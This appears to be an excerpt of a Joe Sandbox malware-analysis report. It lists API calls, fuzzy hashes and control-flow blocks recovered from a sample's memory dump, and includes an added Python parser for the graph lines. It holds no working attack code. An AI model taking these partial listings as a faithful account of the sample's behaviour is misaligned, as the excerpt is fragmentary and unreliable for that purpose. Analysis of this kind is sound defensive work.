                                                                                                    • Source File: 00000000.00000002.2551805234.0000000000DE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_de0000_Merge.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1703294689-0
                                                                                                    • Opcode ID: 5caa76ca4018e7d8fe8f92b33385491b6c37e99b3e7f3beff8d0927267b748b6
                                                                                                    • Instruction ID: 47a2af0717716434e9597db70e9239e6c9cbad10766036e43a74dddab6a86b91
                                                                                                    • Opcode Fuzzy Hash: 5caa76ca4018e7d8fe8f92b33385491b6c37e99b3e7f3beff8d0927267b748b6
                                                                                                    • Instruction Fuzzy Hash: ADD09E31001104AFCF123FA4ED4D99D3F26AF54292B44C015B90957125CB7999A2DB95

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(01D15E68,0000000C), ref: 016BB22B
                                                                                                    • ExitThread.KERNEL32 ref: 016BB232
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2551805234.0000000000DE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2562339066.00000000027B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.00000000031B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_de0000_Merge.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorExitLastThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 1611280651-0
                                                                                                    • Opcode ID: 56a6cba27dbf5c744996557e06104bbdb42282dd575cbace9cc2562cb4ae4b4a
                                                                                                    • Instruction ID: 76965034914c526feeb87d1a03c254bedf5d10a46e3a05243514220cd32f1b48
                                                                                                    • Opcode Fuzzy Hash: 56a6cba27dbf5c744996557e06104bbdb42282dd575cbace9cc2562cb4ae4b4a
                                                                                                    • Instruction Fuzzy Hash: 0CF0C2B1D00206AFDB12AFB4CC48EBE3B72FF91251F20458DE4019B295CB745941CBA5

                                                                                                     Control-flow Graph
                                                                                                     Basic blocks (id: address range; API and internal calls made in the block):
                                                                                                     • 61: 16dc54e-16dc557
                                                                                                     • 62: 16dc559-16dc56c; RtlFreeHeap
                                                                                                     • 63: 16dc586-16dc587
                                                                                                     • 64: 16dc56e-16dc585; GetLastError, call 16cb404, call 16cb4a1
                                                                                                     Edges: 61->62, 61->63, 62->63, 62->64, 64->63
                                                                                                    APIs
                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000000,?,016E49A0,?,00000000,?,?,016E4C41,?,00000007,?,?,016E50E7,?,?), ref: 016DC564
                                                                                                    • GetLastError.KERNEL32(?,?,016E49A0,?,00000000,?,?,016E4C41,?,00000007,?,?,016E50E7,?,?), ref: 016DC56F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2551805234.0000000000DE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_de0000_Merge.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 485612231-0
                                                                                                    • Opcode ID: 8369c85064e43f0b27dc36aed785f1b04b74aa26a2f5f56b1eb12847ee8c23eb
                                                                                                    • Instruction ID: 8e0be500849d2ee203909315798ccd85d0c5975137d08f0d87c1fc74c6ccf39d
                                                                                                    • Opcode Fuzzy Hash: 8369c85064e43f0b27dc36aed785f1b04b74aa26a2f5f56b1eb12847ee8c23eb
                                                                                                    • Instruction Fuzzy Hash: 2DE0CD31500214E7DB322FF4EC09B597B6DEF407E2F54802DF60896154DB308550D788

                                                                                                     Control-flow Graph
                                                                                                     Basic blocks (id: address range; API and internal calls made in the block):
                                                                                                     • 69: 16dca11-16dca3b
                                                                                                     • 70: 16dca3d-16dca3f
                                                                                                     • 71: 16dca41-16dca43
                                                                                                     • 72: 16dca92-16dca95
                                                                                                     • 73: 16dca49-16dca50; call 16dc946
                                                                                                     • 74: 16dca45-16dca47
                                                                                                     • 76: 16dca55-16dca59
                                                                                                     • 77: 16dca78-16dca8f
                                                                                                     • 78: 16dca5b-16dca69; GetProcAddress
                                                                                                     • 79: 16dca91
                                                                                                     • 80: 16dca6b-16dca76; call 16ba2cc
                                                                                                     Edges: 69->70, 69->71, 70->72, 71->73, 71->74, 73->76, 74->72, 76->77, 76->78, 77->79, 78->77, 78->80, 79->72, 80->79
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2551805234.0000000000DE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_de0000_Merge.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 46ce45ca8733ee4dab7b9e5ebfe276bfe819a6985ed49d4b7cd776262dad6ee3
                                                                                                    • Instruction ID: aacc8bd009b05984251e292cd3b1e970eccbbe2ebeacf32f3ff1f48d3f5b7bbe
                                                                                                    • Opcode Fuzzy Hash: 46ce45ca8733ee4dab7b9e5ebfe276bfe819a6985ed49d4b7cd776262dad6ee3
                                                                                                    • Instruction Fuzzy Hash: 9201F933A042299BDB26CEACEC409263766BBC53357184218FE149B288DF32D811C781

                                                                                                     Control-flow Graph
                                                                                                     Basic blocks (id: address range; API and internal calls made in the block):
                                                                                                     • 83: 16dc150-16dc15b
                                                                                                     • 84: 16dc15d-16dc167
                                                                                                     • 85: 16dc169-16dc16f
                                                                                                     • 86: 16dc19d-16dc1a8; call 16cb4a1
                                                                                                     • 87: 16dc188-16dc199; RtlAllocateHeap
                                                                                                     • 88: 16dc171-16dc172
                                                                                                     • 89: 16dc19b
                                                                                                     • 90: 16dc174-16dc17b; call 16d8b59
                                                                                                     • 93: 16dc1aa-16dc1ac
                                                                                                     • 96: 16dc17d-16dc186; call 16d64d7
                                                                                                     Edges: 83->84, 83->85, 84->85, 84->86, 85->87, 85->88, 86->93, 87->89, 87->90, 88->87, 89->93, 90->86, 90->96, 96->86, 96->87
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,?,?,016DBCC0,00000001,00000364,?,00000006,000000FF,?,016BB23D,01D15E68,0000000C), ref: 016DC191
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2551805234.0000000000DE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_de0000_Merge.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: 2c38818be64291b2a5e712a0e48f4e317716e759174aa857ea0cb07fdb20f01b
                                                                                                    • Instruction ID: 4794b6e69a8a7e0ebc9fdf996781b4de2581e13d9461877d0dbd2837ab0598cc
                                                                                                    • Opcode Fuzzy Hash: 2c38818be64291b2a5e712a0e48f4e317716e759174aa857ea0cb07fdb20f01b
                                                                                                    • Instruction Fuzzy Hash: 1CF0E931D45239B7FB212B79DC04F6A7B59AF816B2B14811DED14D7284CF30D401C6E0
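
                                                                                                     The flattened control_flow_graph lines in these function blocks (a block id, its address range, any API names or "call <addr>" targets inside the block, then id->id edges) are easier to query once parsed. The parser below is an added example written for this page; it is not part of the Joe Sandbox report or of the Joe Sandbox IDA plugin, and the token grammar it implements is inferred from the lines shown here, so treat it as an assumption. The two sample inputs are the control_flow_graph lines for the functions at 16dc54e and 16dd11e copied from this report. It maps the ref: addresses on the APIs lines back to their blocks, lists the API call sequence along every path from entry to exit, and flags the back edge that closes the loop around the RtlAllocateHeap call in 16dd11e.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

# Two control_flow_graph lines copied from the function blocks in this report
# (the RtlFreeHeap wrapper at 0x16dc54e and the RtlAllocateHeap loop at 0x16dd11e).
CFG_FREE = (
    "control_flow_graph 61 16dc54e-16dc557 62 16dc559-16dc56c RtlFreeHeap "
    "61->62 63 16dc586-16dc587 61->63 62->63 64 16dc56e-16dc585 GetLastError "
    "call 16cb404 call 16cb4a1 62->64 64->63"
)
CFG_ALLOC = (
    "control_flow_graph 99 16dd11e-16dd12a 100 16dd15c-16dd167 call 16cb4a1 "
    "99->100 101 16dd12c-16dd12e 99->101 108 16dd169-16dd16b 100->108 "
    "103 16dd147-16dd158 RtlAllocateHeap 101->103 104 16dd130-16dd131 101->104 "
    "105 16dd15a 103->105 106 16dd133-16dd13a call 16d8b59 103->106 104->103 "
    "105->108 106->100 111 16dd13c-16dd145 call 16d64d7 106->111 111->100 111->103"
)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
RANGE_RE = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$")


@dataclass
class Block:
    id: int
    start: int                                      # address of the first instruction
    end: int                                        # address of the last instruction
    apis: List[str] = field(default_factory=list)   # imported APIs referenced in the block
    calls: List[int] = field(default_factory=list)  # direct calls to functions in the dump
    succ: List[int] = field(default_factory=list)   # successor block ids, in edge order


def parse_cfg(line: str) -> Dict[int, Block]:
    """Parse one flattened control_flow_graph line (grammar inferred from the report)."""
    tokens = line.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks: Dict[int, Block] = {}
    edges: List[Tuple[int, int]] = []
    cur: Optional[Block] = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif tok.isdigit():
            # A bare decimal token opens a block and the next token is its address range.
            # Addresses only ever follow an id or "call", so a digit token here is an id.
            r = RANGE_RE.match(tokens[i + 1]) if i + 1 < len(tokens) else None
            if r is None:
                raise ValueError(f"block {tok} has no address range")
            start = int(r.group(1), 16)
            end = int(r.group(2), 16) if r.group(2) else start   # one-instruction block
            cur = Block(int(tok), start, end)
            blocks[cur.id] = cur
            i += 2
        elif cur is None:
            raise ValueError(f"annotation {tok!r} before any block")
        elif tok == "call":
            if i + 1 >= len(tokens):
                raise ValueError("dangling call")
            cur.calls.append(int(tokens[i + 1], 16))
            i += 2
        else:
            cur.apis.append(tok)                    # any other token is an API name
            i += 1
    for src, dst in edges:
        if src not in blocks or dst not in blocks:
            raise ValueError(f"edge {src}->{dst} references an unknown block")
        blocks[src].succ.append(dst)
    return blocks


def entry_block(blocks: Dict[int, Block]) -> Block:
    """The block no edge points to (lowest address if there are several)."""
    targets = {d for b in blocks.values() for d in b.succ}
    roots = [b for b in blocks.values() if b.id not in targets]
    if not roots:
        raise ValueError("no entry block: every block has a predecessor")
    return min(roots, key=lambda b: b.start)


def exit_blocks(blocks: Dict[int, Block]) -> List[int]:
    return sorted(b.id for b in blocks.values() if not b.succ)


def block_for_address(blocks: Dict[int, Block], addr: int) -> Optional[Block]:
    """Map an instruction address (e.g. the ref: of an APIs line) to its block."""
    for b in blocks.values():
        if b.start <= addr <= b.end:
            return b
    return None


def api_sequences(blocks: Dict[int, Block]) -> List[Tuple[str, ...]]:
    """API names met along every simple path from the entry block to an exit block."""
    exits = set(exit_blocks(blocks))
    found: Set[Tuple[str, ...]] = set()

    def walk(bid: int, seen: Set[int], apis: List[str]) -> None:
        blk = blocks[bid]
        apis = apis + blk.apis
        if bid in exits:
            found.add(tuple(apis))
        for s in blk.succ:
            if s not in seen:
                walk(s, seen | {s}, apis)

    entry = entry_block(blocks).id
    walk(entry, {entry}, [])
    return sorted(found)


def back_edges(blocks: Dict[int, Block]) -> Set[Tuple[int, int]]:
    """DFS back edges from the entry block; each one closes a loop in the function."""
    white, grey, black = 0, 1, 2
    colour = {bid: white for bid in blocks}
    found: Set[Tuple[int, int]] = set()

    def dfs(bid: int) -> None:
        colour[bid] = grey
        for s in blocks[bid].succ:
            if colour[s] == grey:
                found.add((bid, s))
            elif colour[s] == white:
                dfs(s)
        colour[bid] = black

    dfs(entry_block(blocks).id)
    return found


if __name__ == "__main__":
    for name, line in (("16dc54e", CFG_FREE), ("16dd11e", CFG_ALLOC)):
        b = parse_cfg(line)
        print(name, "entry", entry_block(b).id, "exits", exit_blocks(b))
        print("  API sequences:", api_sequences(b))
        print("  loops closed by:", back_edges(b) or "none")
```

                                                                                                     For 16dc54e the ref: addresses 016DC564 and 016DC56F from its APIs lines land in blocks 62 and 64, and the only path that reaches GetLastError is the one through RtlFreeHeap, which is what the report's ErrorFreeHeapLast API ID summarises. For 16dd11e the back edge 111->103 is the loop that re-enters the RtlAllocateHeap block after the calls to 16d8b59 and 16d64d7.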

                                                                                                     Control-flow Graph
                                                                                                     Basic blocks (id: address range; API and internal calls made in the block):
                                                                                                     • 99: 16dd11e-16dd12a
                                                                                                     • 100: 16dd15c-16dd167; call 16cb4a1
                                                                                                     • 101: 16dd12c-16dd12e
                                                                                                     • 103: 16dd147-16dd158; RtlAllocateHeap
                                                                                                     • 104: 16dd130-16dd131
                                                                                                     • 105: 16dd15a
                                                                                                     • 106: 16dd133-16dd13a; call 16d8b59
                                                                                                     • 108: 16dd169-16dd16b
                                                                                                     • 111: 16dd13c-16dd145; call 16d64d7
                                                                                                     Edges: 99->100, 99->101, 100->108, 101->103, 101->104, 103->105, 103->106, 104->103, 105->108, 106->100, 106->111, 111->100, 111->103
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,016C1B39,01D15FC8,00000014,00000003), ref: 016DD150
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2551805234.0000000000DE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2551668024.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000173C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001755000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000176D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001826000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001894000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000018AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001909000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000196A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000019BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000019D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001AA9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001AF6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2560993757.0000000001D1A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561662999.0000000001D28000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561700282.0000000001D2B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561724024.0000000001D79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561724024.0000000001DB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.0000000001DB6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.00000000027B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.00000000031B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_de0000_Merge.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: 5902bfa99bf6030a5a0f9b45063edadc7239bcc8bf17ec950f99dd71c74d5d30
                                                                                                    • Instruction ID: 65b08d4d5b4f9c8f6b65a7ce8ce668dd3f1a861416cc3afe147fafa70a495fc7
                                                                                                    • Opcode Fuzzy Hash: 5902bfa99bf6030a5a0f9b45063edadc7239bcc8bf17ec950f99dd71c74d5d30
                                                                                                    • Instruction Fuzzy Hash: 36E06D35D41222ABEA213AF99C04B7B7F6EDF827B2F094125EE05963C0DB64D801C6E5
                                                                                                    APIs
                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 016C20DF
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 016C20E9
                                                                                                    • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 016C20F6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2551805234.0000000000DE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_de0000_Merge.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                    • String ID:
                                                                                                    • API String ID: 3906539128-0
                                                                                                    • Opcode ID: b471c5a3a3c444baab831776dbdb82a1e84a4174465eec2399ca52cf760a45c3
                                                                                                    • Instruction ID: 40430dc6cbb6d8d3ebf11ca1704edb1e760bb7cf5ba3e601d4c23e421f21b533
                                                                                                    • Opcode Fuzzy Hash: b471c5a3a3c444baab831776dbdb82a1e84a4174465eec2399ca52cf760a45c3
                                                                                                    • Instruction Fuzzy Hash: 1731D275901229ABCB21DF28DC8879DBBB8FF58710F5041EAE91CA7290E7709B858F45
                                                                                                    APIs
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 016AF347
                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 016AF34F
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 016AF3D8
                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 016AF403
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 016AF458
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2551805234.0000000000DE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_de0000_Merge.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                    • String ID: csm
                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                    • Opcode ID: 45ccb981a9014892a03f1424524715220959aa2ad7c738be7a9d949ab2524ff4
                                                                                                    • Instruction ID: ef0268b7d848cb6d362408709ce7f48c7f0128ddbc63c4f04cc336b0f2ac3307
                                                                                                    • Opcode Fuzzy Hash: 45ccb981a9014892a03f1424524715220959aa2ad7c738be7a9d949ab2524ff4
                                                                                                    • Instruction Fuzzy Hash: 1051C235A01219AFCB10DF68CC84AAEBBA6EF45314F548199E9145B352D732EE05CFD2
                                                                                                    APIs
                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BBD71996,?,?,00000000,01732A40,000000FF,?,016BA490,00000002,?,016BA464,016CB280), ref: 016BA4E9
                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 016BA4FB
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,01732A40,000000FF,?,016BA490,00000002,?,016BA464,016CB280), ref: 016BA51D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2551805234.0000000000DE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_Merge.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll

Execution Graph

Execution Coverage: 5.1%
Dynamic/Decrypted Code Coverage: 0.3%
Signature Coverage: 9.3%
Total number of Nodes: 2000
Total number of Limit Nodes: 77
50258->50261 50264 1116e515 CreateFileA 50259->50264 50267 1116e391 50259->50267 50323 111636c4 11 API calls _strcpy_s 50260->50323 50261->50245 50265 1116e5b2 GetFileType 50264->50265 50266 1116e542 50264->50266 50269 1116e603 50265->50269 50270 1116e5bf GetLastError __dosmaperr CloseHandle 50265->50270 50268 1116e57b GetLastError __dosmaperr 50266->50268 50271 1116e556 CreateFileA 50266->50271 50267->50245 50268->50272 50324 1116be72 SetStdHandle 50269->50324 50270->50272 50273 1116e5f6 50270->50273 50271->50265 50271->50268 50319 11163672 50272->50319 50273->50272 50275 1116e621 50276 1116e677 50275->50276 50278 1116e837 50275->50278 50279 1116e6e6 50275->50279 50325 11169ed0 14 API calls __chsize_nolock 50276->50325 50278->50272 50280 1116e99f CloseHandle CreateFileA 50278->50280 50279->50278 50286 1116e840 50279->50286 50292 1116e790 50279->50292 50280->50273 50281 1116e9cc GetLastError __dosmaperr 50280->50281 50368 1116bef3 SetStdHandle 50281->50368 50282 1116e681 50295 1116e68a 50282->50295 50326 11169823 50282->50326 50285 1116e6b4 50289 1116e6cd 50285->50289 50363 11171684 40 API calls 3 library calls 50285->50363 50286->50278 50293 1116e85d __lseeki64_nolock 50286->50293 50299 1116e7b4 50286->50299 50287 1116e808 50291 11169823 __read_nolock 30 API calls 50287->50291 50288 1116e697 __close_nolock 50288->50272 50289->50288 50364 11169ed0 14 API calls __chsize_nolock 50289->50364 50305 1116e815 50291->50305 50292->50278 50292->50287 50297 1116e7df __lseeki64_nolock 50292->50297 50292->50299 50296 1116e873 __lseeki64_nolock 50293->50296 50293->50299 50295->50279 50295->50288 50298 1116e882 50296->50298 50297->50299 50302 1116e7f1 __lseeki64_nolock 50297->50302 50298->50278 50300 1116e88a 50298->50300 50299->50278 50299->50288 50367 1116782e 34 API calls 4 library calls 50299->50367 50300->50288 50302->50287 50302->50288 50303 1116e89e __close_nolock 50303->50272 50304 1116e8b8 50306 1116e8da 50304->50306 50308 1116e8bf 50304->50308 50305->50278 50305->50288 
50305->50303 50305->50304 50305->50306 50366 11169ed0 14 API calls __chsize_nolock 50306->50366 50365 11169ed0 14 API calls __chsize_nolock 50308->50365 50309 1116e8e3 50309->50298 50311 1116e8c9 50311->50288 50312 1116e8d4 50311->50312 50312->50278 50313->50245 50315 11171916 50314->50315 50316 11171901 50314->50316 50315->50251 50317 111636c4 _strcpy_s 11 API calls 50316->50317 50318 11171911 50317->50318 50318->50251 50320 11163549 __call_reportfault 8 API calls 50319->50320 50321 11163684 GetCurrentProcess TerminateProcess 50320->50321 50321->50250 50322->50267 50323->50267 50324->50275 50325->50282 50327 1116985a 50326->50327 50329 1116983f 50326->50329 50330 11169869 50327->50330 50332 11169888 50327->50332 50328 111698a6 50335 111636c4 _strcpy_s 11 API calls 50328->50335 50329->50285 50331 111636c4 _strcpy_s 11 API calls 50330->50331 50331->50329 50332->50328 50332->50329 50333 111698ef 50332->50333 50334 11169929 50332->50334 50333->50328 50341 111698fa ReadFile 50333->50341 50336 1115f539 __malloc_crt 16 API calls 50334->50336 50335->50329 50338 1116993f 50336->50338 50338->50329 50342 11169967 __lseeki64_nolock 50338->50342 50339 11169a25 50340 11169d9d GetLastError 50339->50340 50344 11169a39 50339->50344 50343 11169dc1 50340->50343 50357 11169ba4 50340->50357 50341->50339 50341->50340 50342->50341 50345 11169c24 __dosmaperr 50343->50345 50343->50357 50347 11169c69 50344->50347 50349 11169a55 50344->50349 50344->50357 50345->50357 50346 11169c37 _free 50346->50329 50348 11169cde ReadFile 50347->50348 50347->50357 50351 11169d07 50348->50351 50352 11169cfd GetLastError 50348->50352 50350 11169ab9 ReadFile 50349->50350 50358 11169b36 50349->50358 50353 11169ad7 GetLastError 50350->50353 50354 11169ae1 50350->50354 50351->50347 50359 11169d4a __lseeki64_nolock 50351->50359 50352->50347 50352->50351 50353->50349 50353->50354 50354->50349 50360 11169b0f __lseeki64_nolock 50354->50360 50355 11169bfa MultiByteToWideChar 50356 11169c1e GetLastError 50355->50356 
50355->50357 50356->50345 50357->50329 50357->50346 50358->50357 50361 11169b6e 50358->50361 50362 11169be8 __lseeki64_nolock 50358->50362 50359->50347 50360->50349 50361->50355 50362->50355 50363->50289 50364->50295 50365->50311 50366->50309 50367->50299 50368->50273 50369->50261 50371 11166fb2 50370->50371 50373 11166fc7 50370->50373 50394 111636c4 11 API calls _strcpy_s 50371->50394 50375 11166ffc 50373->50375 50377 11166fc2 50373->50377 50380 1116c70e 50373->50380 50383 11169dda 50375->50383 50377->50147 50378->50144 50379->50147 50395 1115f539 50380->50395 50385 11169de6 50383->50385 50384 11169e15 50408 111636c4 11 API calls _strcpy_s 50384->50408 50385->50384 50386 11169dee 50385->50386 50387 11169e71 50385->50387 50386->50377 50401 1116bfe2 50387->50401 50389 11169e77 50391 11169823 __read_nolock 30 API calls 50389->50391 50392 11169e91 50389->50392 50391->50392 50409 11169ec8 __unlock_fhandle 50392->50409 50394->50377 50397 1115f542 50395->50397 50396 111583b1 _malloc 15 API calls 50396->50397 50397->50396 50398 1115f578 50397->50398 50399 1115f559 Sleep 50397->50399 50398->50375 50400 1115f56e 50399->50400 50400->50397 50400->50398 50402 1116bfee 50401->50402 50403 1116c013 __lock 50402->50403 50406 1116c036 50402->50406 50405 1116c023 InitializeCriticalSectionAndSpinCount 50403->50405 50403->50406 50404 1116c04d EnterCriticalSection 50407 1116c06a 50404->50407 50405->50406 50406->50404 50406->50407 50407->50389 50408->50386 50409->50386 50410->50157 50412 111097f1 50411->50412 50412->50412 50413 111097f9 GetVolumeInformationA 50412->50413 50414 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 50413->50414 50415 11109830 50414->50415 50415->50164 50417 110c974c 50416->50417 50418 110c9739 50416->50418 50417->50174 50417->50175 50418->50417 50421 110c95f0 50418->50421 50422 110c95fb 50421->50422 50423 110c9612 50421->50423 50426 11027f50 6 API calls 50422->50426 50423->50417 50428 11107a57 EnterCriticalSection 50427->50428 50429 11107a4e 
GetCurrentThreadId 50427->50429 50430 11107a6e 50428->50430 50429->50428 50431 11107a75 LeaveCriticalSection 50430->50431 50432 11107a88 LeaveCriticalSection 50430->50432 50431->50182 50432->50182 50433->50188 50434->50196 50436 1102b5f3 50435->50436 50438 1107d140 IsDBCSLeadByte 50436->50438 50444 1102b61a 50436->50444 50437 1113b570 21 API calls 50439 1102b6f4 50437->50439 50438->50444 50449 1102b704 50439->50449 50486 11025890 50439->50486 50441 1102b810 50443 1102b84a CloseHandle 50441->50443 50446 1102b865 50441->50446 50442 1105ddb0 169 API calls 50442->50449 50443->50446 50444->50437 50447 1105d820 25 API calls 50446->50447 50453 1102b894 50446->50453 50467 1102b8fe 50446->50467 50447->50453 50448 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 50451 1102b93a 50448->50451 50449->50441 50449->50442 50450 1102b817 Sleep 50449->50450 50452 1102b78d OpenSCManagerA 50449->50452 50450->50449 50451->49455 50452->50449 50454 1102b7a0 50452->50454 50456 1113b0a0 122 API calls 50453->50456 50457 1102b7a2 OpenServiceA 50454->50457 50460 1102b8b3 50456->50460 50458 1102b7b6 QueryServiceStatus CloseServiceHandle 50457->50458 50459 1102b7e5 CloseServiceHandle 50457->50459 50458->50459 50461 1102b7d4 Sleep 50458->50461 50459->50449 50462 111395a0 8 API calls 50460->50462 50461->50457 50461->50459 50463 1102b8ca 50462->50463 50464 1102b8e8 50463->50464 50465 1105ee80 169 API calls 50463->50465 50491 11029350 50464->50491 50465->50464 50467->50448 50469 1102c724 50468->50469 50470 1113c594 LoadLibraryA 50468->50470 50469->49457 50469->49463 50470->50469 50471 1113c5a8 50470->50471 50557 1113b8f0 20 API calls 